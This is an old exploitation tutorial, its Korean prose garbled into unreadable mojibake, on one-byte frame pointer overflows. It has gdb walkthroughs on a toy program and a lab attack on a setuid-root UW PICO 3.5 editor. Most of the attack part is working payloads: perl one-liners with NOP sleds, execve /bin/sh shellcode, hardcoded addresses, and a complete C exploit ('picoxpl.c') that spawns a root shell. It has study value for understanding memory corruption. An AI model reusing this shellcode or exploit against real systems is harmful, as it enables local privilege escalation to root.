======================================================================================= Title: Frame Pointer Overflow of other method Author : À¯µ¿ÈÆ (Xpl017Elz) E-mail : szoahc@hotmail.com Home: http://x82.i21c.net Date: f. 2001/10/12 s. 2001/11/22 ======================================================================================= * Content: 0x00. ¹è°æÁö½Ä ¼³¸í 0x01. Training 0x02. Frame Pointer Overflow of other method 0x03. Realattack :-) - 0x00. System Check - 0x01. Bug Testing - 0x02. Training - 0x03. pico frame pointer overflow - 0x04. exploit * Frame Pointer °ø°Ý¿¡ ´ëÇÑ ±âº»Áö½ÄÀÌ ¾ø´ÂºÐµéÀº ¸ÕÀú phrack 55È£ 8¹ø° ±ÛÀ» ÂüÁ¶Çϱ⠹ٶõ´Ù. URL: http://www.phrack.org/show.php?p=55&a=8 ======================================================================================= 0x00. ¹è°æÁö½Ä ¼³¸í Frame Pointer¶õ Stack PointerÀÇ °ªÀ» °¡Áö°í Áö¿ªº¯¼öÀÇ Base Pointer°¡ µÇ´Â RegisterÀÌ´Ù. (%ebp Register) º¸Åë Frame Pointer Overflow °ø°Ý ´ë»ó ProgramÀº ´ÙÀ½°ú °°Àº StackÀÇ structure¸¦ °®´Â´Ù. *----------------* | buffer | data input buffer *----------------* *----------------* | e b p | function() %ebp: 4byte +----------------* *----------------* | function() RET | function() Return address: 4byte *----------------* *----------------* | e b p | main() %ebp: 4byte *----------------* *----------------* | main() RET | main() Return address: 4byte *----------------* ´ëºÎºÐ Frame Pointer Overflow°¡ ÀϾ´Â °ÍÀº function() ÇÔ¼öÀÇ %ebp ¸¶Áö¸· 1byte ¿µ¿ªÀÌ´Ù. (¾Æ·¡ÀÇ ¿¹Á¦ source °°Àº °æ¿ì¶ó°í º¼¼öÀÖ´Ù.) function(char *argument) { char buffer[80]; int count; for(count=0;count<=80;count++) buffer[count]=argument[count]; } ÀԷ¹޴ buffer°ªº¸´Ù ´Ü, 1byte¸¦ ÃÊ°úÇÑ´Ù. ÀÌ·Î½á ¿ì¸®´Â %ebp ¸¶Áö¸· ÁÖ¼Ò¸¦ º¯°æÇÒ¼ö ÀְԵȴÙ. ¸¸¾à main()ÇÔ¼öÀÇ ³¡¿¡¼­ function()ÇÔ¼ö°¡ ºÒ·ÁÁø ÈÄ¿¡ %ebp°¡ %esp·Î ÀúÀåµÈ´Ù¸é, ¿ì¸®´Â %esp¸¦ ÀÓÀÇ·Î ¼³Á¤ÇÒ¼ö ÀְԵȴÙ. [x82@testsub x82]$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) [x82@testsub x82]$ gdb test ... (gdb) break *main+54 Breakpoint 1 at 0x80486a2 (gdb) r `perl -e 'print "x"x80;print "\x50"'` Starting program: /home/x82/test `perl -e 'print "x"x80;print "\x50"'` Breakpoint 1, 0x80486a2 in main () (gdb) info reg eax 0x1 1 ecx 0x400 1024 edx 0x401063c0 1074815936 ebx 0x40107bec 1074822124 esp 0xbffff954 -1073743532 ebp 0x7 7 esi 0x4000a600 1073784320 edi 0xbffffa34 -1073743308 eip 0x80486a2 134514338 eflags 0x286 646 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 cwd 0xffff037f -64641 swd 0xffff0000 -65536 twd 0xffffffff -1 fip 0x401ecbd8 1075760088 fcs 0x6d90023 114884643 fopo 0x0 0 fos 0xffff002b -65493 (gdb) x/10 $esp 0xbffff954: 0xbffff974 0x0804861a 0x08048717 0x00000050 0xbffff964: 0x4000a600 0x0000001a 0x00000078 0x00000078 0xbffff974: 0xbffff9dc 0x08048663 (gdb) %ebpÀÇ ¸¶Áö¸· 1byte¸¦ "\x50"À¸·Î OverwriteÇÑ °á°ú, %esp´Â %ebpº¸´Ù 4byte¸¸Å­ Áõ°¡ÇÏ¿´´Ù. À̸¦ ÅëÇØ Stack Pointer±îÁö º¯°æÇÏ¿´´Ù. °ø°ÝÀÚ´Â %espÀÇ º¯°æÀ» ÅëÇØ Processer°¡ StackÀ¸·ÎºÎÅÍ Æ¯Á¤°ªµµ %eipÀΰÍó·³ ¼Ó¿© ½ÇÇàÆÐÅÏÀ» º¯°æÇÒ¼ö ÀÖ´Ù. Áï, Return address¿¡ Á¢±ÙÇÏÁö ¾Ê°íµµ ´Ü 1byte º¯°æÀ» ÅëÇØ ProgramÀÇ ½ÇÇàÆÐÅÏÀÇ º¯°æÀÌ °¡´ÉÇÏ´Ù´Â ¾ê±â´Ù. Âü°í·Î Phrack 55-8È£ÀÇ ±ÛÀ̳ª ±âŸ Frame Pointer Overflow ¹®¼­¸¦ º¸¸é, %esp°¡ shellcode address¸¦ ´ã°íÀÖ´Â ÁÖ¼Ò¸¦ °¡¸®Å°°Ô ÇϹǷνá shellÀÇ ½ÇÇàÀ» ÅëÄèÇÏ°Ô È®ÀνÃÄÑÁØ´Ù. ±×·³ À̹ø¿£ °£´ÜÇÑ Training ÀÛ¾÷À» °ÅÄ¡°í ³Ñ¾î°¡µµ·Ï ÇÏÀÚ. 0x01. Training (gdb) r `perl -e 'print "x"x80'` Starting program: /home/x82/test `perl -e 'print "x"x80'` Program received signal SIGILL, Illegal instruction. 0xbffff124 in ?? () (gdb) x/10 0xbffff104 (0xbffff100 + 4byte) 0xbffff104: 0xbffff124 0x0804861a 0x08048717 0x00000000 ~~~~~~~~~~ 0xbffff114: 0x4000a610 0x0000001a 0x00000078 0x00000078 0xbffff124: 0xbffff18c 0x08048663 (gdb) r `perl -e 'print "x"x36;print "\x11\x11\x11\x11";print "x"x40;print "\x5c"'` Starting program: /home/x82/test `perl -e 'print "x"x36;print "\x11\x11\x11\x11";print "x"x40;print "\x5c"'` Program received signal SIGSEGV, Segmentation fault. 0x11111111 in ?? () (gdb) ... (gdb) info reg eax 0x1 1 ecx 0x400 1024 edx 0x40104c60 1074809952 ebx 0x4010648c 1074816140 esp 0xbffff164 0xbffff164 ebp 0x78787878 0x78787878 esi 0x4000a610 1073784336 edi 0xbffff1e4 -1073745436 eip 0x11111111 0x11111111 eflags 0x10282 66178 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 (gdb) ¿øÇϴ¹٠%eip°ªÀÌ 0x11111111·Î º¯°æµÇ¾ú´Ù. ±×·³ À̹ø¿£ \x11\x11\x11\x11 ´ë½Å, shellcodeÀÇ address·Î ´ëÀÔÇغ¸ÀÚ. ½Å¼ÓÇÑ ÀÛ¾÷À» À§ÇØ eggshell ProgramÀ» ÀÌ¿ëÇÏ¿© ÀÏÁ¤ Stack¿¡ shellcode¸¦ pushÇÏ°í ÁÖ¼Ò°ªÀ» ¾ò¾ú´Ù. [x82@testsub x82]$ ./eggshell Using address: 0xbffffba8 bash$ 0xbffffba8 °ªÀ» ÀúÀåÇÒ ÁÖ¼Ò´Â 0xbffff170ÀÌ´Ù. (¿¹»ó) ¿ì¸®´Â ÀÌ¹Ì ¸¶Áö¸·¿¡ Overwrite µÇ¾îÁö´Â %ebp°ªÀÌ 4byte Áõ°¡ÇÒ %esp¶õ°ÍÀ» ¾Ë±â¶§¹®¿¡ "\x6c"(0xbffff170 - 4byte = 0xbffff16c)¶ó´Â ÁÖ¼Ò¸¦ ¾òÀ»¼ö ÀÖ´Ù. ±×, °á°ú ... bash$ perl -e 'system "./test","xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\xa8\xfb\xff\xbfxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\x6c"' bash# bash# ls -al test -rwsr-xr-x 1 root root 12586 Nov 24 14:33 test bash# ¿ì¸®ÀÇ ¿¹»óÀº ¸Â¾Æ ¶³¾îÁ³´Ù. %eip addressÀÇ °ªÀº 0xbffffba8À» ¶ì°í ÀÖÀ»°ÍÀÌ´Ù. ±×·¸´Ù¸é, À§¿Í´Â ¾à°£ ´Ù¸¥ ¹æ¹ýÀ» ÀÌ¿ëÇØ shellÀ» ¶ç¿öº¸µµ·Ï ÇÏ°Ú´Ù. 0x02. Frame Pointer Overflow of other method ÀϹÝÀûÀÎ Composition: NOP - 56byte Shellcode - 24byte Last %ebp - 1byte Total - 81byte (gdb) r `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\ ... Áß·« ... \x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'` Starting program: /home/x82/f `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\ ... Áß·« ... \x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"'` Breakpoint 1, 0x80486a2 in main () (gdb) x/80 0xbffffb00 0xbffffb00: 0x00000007 0xbffffb24 0x0804861a 0x08048717 0xbffffb10: 0x00000000 0x4000a610 0x0000001a 0x00000078 0xbffffb20: 0x00000078 0xbffffb8c 0x08048663 0xbffffb3c 0xbffffb30: 0x00000078 0x4010648c 0x00000051 0x90909090 0xbffffb40: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb70: 0x90909090 0x6852d231 0x68732f6e 0x622f2f68 0xbffffb80: 0x52e38969 0x8de18953 0x80cd0b42 0xbffffb00 ~~~~~~~~~~ 0xbffffb90: 0x0804869e 0xbffffce9 0xbffffbb8 0x400301eb 0xbffffba0: 0x00000002 0xbffffbe4 0xbffffbf0 0x40012024 ... (gdb) c Continuing. Program received signal SIGILL, Illegal instruction. 0xbffffb24 in ?? () (gdb) c Continuing. 0xbffffb00 + 4byte = 0xbffffb04 ¶§¹®¿¡, 0xbffffb24 °ªÀ» ¶Ç °Çµé°í ¸»¾Ò´Ù. À̹ø¿£ "\x90" °ªÀ¸·Î Overwrite¸¦ ½ÃµµÇÏ°Ú´Ù. (µÞºÎºÐ ÂüÁ¶) Program terminated with signal SIGILL, Illegal instruction. The program no longer exists. (gdb) r `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\ ... Áß·« ... \x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80\x90"'` ~~~~ Starting program: /home/x82/f `perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\ ... Áß·« ... \x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80\x90"'` Breakpoint 1, 0x80486a2 in main () (gdb) info reg eax 0x1 1 ecx 0x400 1024 edx 0x40104c60 1074809952 ebx 0x4010648c 1074816140 esp 0xbffffb94 0xbffffb94 ~~~~~~~~~~ ebp 0x804869e 0x804869e esi 0x4000a610 1073784336 edi 0xbffffbe4 -1073742876 eip 0x80486a2 0x80486a2 eflags 0x282 642 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 (gdb) x/10 0xbffffb94 0xbffffb94: 0xbffffce8 0xbffffbb8 0x400301eb 0x00000002 ~~~~~~~~~~ 0xbffffba4: 0xbffffbe4 0xbffffbf0 0x40012024 0x00000002 0xbffffbb4: 0x08048390 0x00000000 (gdb) x/10 0xbffffce8 0xbffffce8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffcf8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffd08: 0x90909090 0x90909090 (gdb) ÀÌ°Ô ¾îÂîµÈ ÀÏÀΰ¡? °ø°ÝÀÚ°¡ ÀÔ·ÂÇÑ NOP°¡ ´Ù¸¥¿µ¿ª¿¡ ÀÚ¸® Àâ°íÀÖ´Ù. °ú¿¬, ¿ì¿¬ÀÇ ÀÏÄ¡Àϱî? (gdb) x/80 0xbffffb00 0xbffffb00: 0x00000007 0xbffffb24 0x0804861a 0x08048717 0xbffffb10: 0x00000090 0x4000a610 0x0000001a 0x00000078 0xbffffb20: 0x00000078 0xbffffb8c 0x08048663 0xbffffb3c 0xbffffb30: 0x00000078 0x4010648c 0x00000051 0x90909090 0xbffffb40: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffb70: 0x90909090 0x6852d231 0x68732f6e 0x622f2f68 0xbffffb80: 0x52e38969 0x8de18953 0x80cd0b42 0xbffffb90 0xbffffb90: 0x0804869e 0xbffffce8 0xbffffbb8 0x400301eb ... Áß ·« ... 0xbffffca0: 0x00000010 0x0387f9ff 0x0000000f 0xbffffcd7 0xbffffcb0: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffcc0: 0x00000000 0x00000000 0x00000000 0x00000000 0xbffffcd0: 0x00000000 0x69000000 0x00363836 0x6d6f682f 0xbffffce0: 0x38782f65 0x00662f32 0x90909090 0x90909090 0xbffffcf0: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffd00: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffd10: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffffd20: 0x6852d231 0x68732f6e 0x622f2f68 0x52e38969 0xbffffd30: 0x8de18953 0x80cd0b42 0x454c0090 0x504f5353 0xbffffd40: 0x7c3d4e45 0x7373656c 0x65706970 0x2068732e À§¸¦ º¸¸é, ¿ì¸®°¡ ÀÔ·ÂÇÑ data °ªÀÌ µÎ¹ø ¹Ýº¹µÇ¾î pushµÈ°ÍÀ» º¼¼öÀÖ´Ù. ÀÌ·¯ÇÑ Çö»óÀº ¸Å¿ì ´ç¿¬ÇÑ ÀÏÀÌ´Ù. ù¹ø°(0xbffffb3c) pushµÈ ¿µ¿ªÀº »ç¿ëÀÚ°¡ Á÷Á¢ÀûÀ¸·Î ÀÔ·ÂÇÑ ºÎºÐÀÌ°í, ±× ¾Æ·¡(0xbffffce8) pushµÈ ¿µ¿ªÀº ±× °ªÀÌ º¹»çµÈ ºÎºÐÀÌ´Ù. Structure: ù¹ø°(0xbffffb3c) pushµÈ ¿µ¿ª - argument[81]; ±× ¾Æ·¡(0xbffffce8) pushµÈ ¿µ¿ª - buffer[81]; ±×·¯¹Ç·Î, function() ÇÔ¼ö Return addressÀÇ ´ÙÀ½ 4byte¿¡ Á¸ÀçÇÏ´Â code¸¦ ½ÇÇàÇϸé, shellcode address¸¦ ¶ç´Â ÁÖ¼Ò¸¦ °¡¸®Å°Áö ¾Ê¾Æµµ shellÀ» ¶ç¿ï¼ö Àִ°ÍÀÌ´Ù. bash$ perl -e 'system "./test","\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80\x90"' bash# À̾ß~ ¿ª½Ã, Çѹø¿¡ ¼º°øÇÏ¿´´Ù. :-) ±×·¯¹Ç·Î, ´ÙÀ½°ú °°Àº °á·ÐÀ» ÁöÀ»¼ö ÀÖ´Ù. * ÀϹÝÀûÀÎ Frame Pointer °ø°Ý: [nops][shellcode][&shellcode][%ebp_altering_byte] Total - 81byte * ¾à°£ ´Ù¸¥ CompositionÀÇ Frame Pointer °ø°Ý: [nops][shellcode][%ebp_altering_byte] (1byte´Â function() ÇÔ¼öÀÇ Return address À§Ä¡¸¦ °¡¸®Å²´Ù) Total - 81byte Á¤È®È÷ ¸»ÇÏÀÚ¸é, %esp°¡ °¡¸®Å°´Â address´Â function() ÇÔ¼öÀÇ Return address 4byte µÞºÎºÐÀ̶ó ÇÏ°Ú´Ù. ¹°·Ð °ø°ÝÀÚ°¡ °ªÀ» ´ëÀÔÇÒ¶§´Â 4byte °¨¼ÒÇÑ °ªÀ» ³Ö´Â´Ù. (function() ÇÔ¼öÀÇ Return address À§Ä¡) ÀÌÁ¦ ¾à°£ »õ·Î¿î(?) ¹æ½ÄÀÇ °ø°ÝÀ» ÀÍÇûÀ¸¹Ç·Î, ´ÙÀ½°ú °°Àº RealattackÀ» ±¸¼ºÇغ¸ÀÚ. 0x03. Realattack Pico editer (/usr/bin/pico) Segfault? It's Frame Pointer Overflow Vulnerability! - 0x00. System Check [x82@xpl017elz x82]$ uname -a Linux xpl017elz.org 2.2.14-5.0 #1 Thu Mar 16 02:23:03 KST 2000 i586 unknown [x82@xpl017elz x82]$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) [x82@xpl017elz x82]$ ls -la /usr/bin/pico -rwsr-xr-x 1 root root 160552 Jun 21 1999 /usr/bin/pico (Imitation environment composition) - 0x01. Bug Testing [x82@xpl017elz x82]$ pico `perl -e "print 'x'x500"` UW PICO(tm) 3.5 New Buffer Segmentation fault [x82@xpl017elz x82]$ - 0x02. Training [x82@xpl017elz x82]$ ./eggshell Using address: 0xbffff9f8 bash$ cp /usr/bin/pico . bash$ gdb -q ./pico (no debugging symbols found)...(gdb) set args `perl -e 'print "x"x80'` (gdb) r Starting program: /home/x82/./pico `perl -e 'print "x"x80'` UW PICO(tm) 3.5 File: .../xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Modified test ^O File Name to write : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ^G Get Help ^T To Files ^C Cancel TAB Complete [ Wrote 2 lines ](no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x0 in ?? () TAB Complete (gdb) info reg eax 0x1 1 ecx 0x401463c0 1075078080 edx 0x401463c0 1075078080 ebx 0x0 0 esp 0xbfffef08 -1073746168 ~~~~~~~~~~ ebp 0x0 0 esi 0x0 0 edi 0x0 0 eip 0x0 0 ~~~ eflags 0x10246 66118 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 cwd 0xffff037f -64641 swd 0xffff0000 -65536 twd 0xffffffff -1 fip 0x401ecbd8 1075760088 fcs 0x6d90023 114884643 fopo 0x0 0 fos 0xffff002b -65493 (gdb) x/20 0xbfffef00 0xbfffef00: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffef10: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffef20: 0x00000000 0x78787878 0x78787878 0x78787878 0xbfffef30: 0x78787878 0x78787878 0x78787878 0x78787878 0xbfffef40: 0x78787878 0x78787878 0x78787878 0x78787878 (gdb) 0xbfffef50: 0x78787878 0x78787878 0x78787878 0x78787878 0xbfffef60: 0x78787878 0x78787878 0x78787878 0x78787878 0xbfffef70: 0x78787878 0xbfffef00 0x0805d62d 0x00000000 ~~~~~~~~~~(ebp) 0xbfffef80: 0x00000001 0x0000014f 0x08075968 0xbffff141 0xbfffef90: 0xbfffefd8 0x08049e18 0xbfffefd8 0x08049e21 (gdb) x 0xbfffef08 0xbfffef08: 0x00000000 (eip) (gdb) frame pointer overflow: 0xbfffef00 (ebp) + 4 = 0xbfffef04 (esp) 0xbfffef04 (esp) ----> 0x00000000 (eip) Conclusion: esp ----> 0xbffff9f8 (&shellcode) - 0x03. pico frame pointer overflow If do overwrite to 80byte, frame pointer overflow happens. 0xbffff9f8 (&shellcode) value is made to situate to 0xbfffef34 address. Alteration by ebp -> 0xbfffef30. Execute shell. 0xbfffef30 (ebp) + 4 = 0xbfffef34 (esp) 0xbfffef34 (esp) ----> 0xbffff9f8 (&shellcode) bash$ perl -e 'system "/usr/bin/pico","xxxxxxxxxxxxxxxx\xf8\xf9\xff\xbfxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\x30\xef\xff\xbf\x2d\xd6\x05\ x08"' UW PICO(tm) 3.5 File: .../xxxxxxxxxxxxxxxxxxxxxxxxxx0ï¿-?E^H Modified test ^O [ Wrote 2 lines ]bash# uid=500(x82) gid=500(x82) euid=0(root) groups=500(x82) ^C Cancel TAB Complete bash# root bash# Kill is control-U (^U). Interrupt is control-C (^C). bash# Ooops~ Executed shell. ;-D If put "\ x30", become not 0xbfffef30 but 0xbfff0030 and accident results. If put "\ x30\xef\xff\xbf", RET becomes 0x0805d600 and accident results. Therefore It is that below value appears. "\x30\xef\xff\xbf\x2d\xd6\x05\x08" = 0xbfffef30 (ebp) 0x0805d62d (RET) - 0x04. exploit /* ** ** How to exploit? ** ** [x82@xpl017elz x82]$ gdb -q pico ** (no debugging symbols found)...(gdb) set args `perl -e 'print "x"x80'` ** (gdb) r ** Starting program: /home/x82/./pico `perl -e 'print "x"x80'` ** ** UW PICO(tm) 3.5 File: .../xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Modified ** ** test ** ^O ** [ Wrote 2 lines ](no debugging symbols found)... ** Program received signal SIGSEGV, Segmentation fault. ** 0x0 in ?? () TAB Complete ** (gdb) x/10 $esp ** 0xbffff908: 0x00000000 0x00000000 0x00000000 0x00000000 ** 0xbffff918: 0x00000000 0x00000000 0x00000000 0x78787878 ** 0xbffff928: 0x78787878 0x78787878 ** (gdb) ** 0xbffff930: 0x78787878 0x78787878 0x78787878 0x78787878 ** 0xbffff940: 0x78787878 0x78787878 0x78787878 0x78787878 ** 0xbffff950: 0x78787878 0x78787878 ** (gdb) ** 0xbffff958: 0x78787878 0x78787878 0x78787878 0x78787878 ** 0xbffff968: 0x78787878 0x78787878 0x78787878 0xbffff900 ** 0xbffff978: 0x0805d62d 0x00000000 ** ~~~~~~~~~~ ** (gdb) ** Return address Position = 0xbffff978 ** Return address value = 0x0805d62d ** [x82@xpl017elz x82]$ gcc -o picoxpl picoxpl.c ** [x82@xpl017elz x82]$ ./picoxpl ** ** UW PICO(tm) 3.5 File: .../shh//bi‰ãRS‰áB^K?€ˆù?-?^E^H^X Modified ** ** Get Root Shell :-) ** ^O ** [ Cannot open file for writing: No such file or directory ]bash# ** bash# reset ** Kill is control-U (^U). ** Interrupt is control-C (^C). ** bash# whoami ** root ** bash# id ** uid=500(x82) gid=500(x82) euid=0(root) groups=500(x82) ** bash# ls -al /usr/bin/pico ** -rwsr-xr-x 1 root root 160552 Jun 21 1999 /usr/bin/pico ** ~~~~~~~~~~ ^^ Do not mistake. Original pico is no setuid. **/ #include #include char shellcode[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52" "\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; main() { int count, num; char xOx[88], exec[1024]; bzero(&xOx,88); for(count = 0; count <= 55; count++) { xOx[count] = 0x90; } for(num = 0; num <= 23; num++) { xOx[count++] = shellcode[num]; } /* Return address Position */ xOx[count++] = 0x88; xOx[count++] = 0xf9; xOx[count++] = 0xff; xOx[count++] = 0xbf; /* That have Return address value */ xOx[count++] = 0x2d; xOx[count++] = 0xd6; xOx[count++] = 0x05; xOx[count++] = 0x08; execl("/usr/bin/pico","pico",xOx,NULL); } /* Beauty of that is simple. ** If is program that have general frame pointer overflow, ** may use this exploit. **/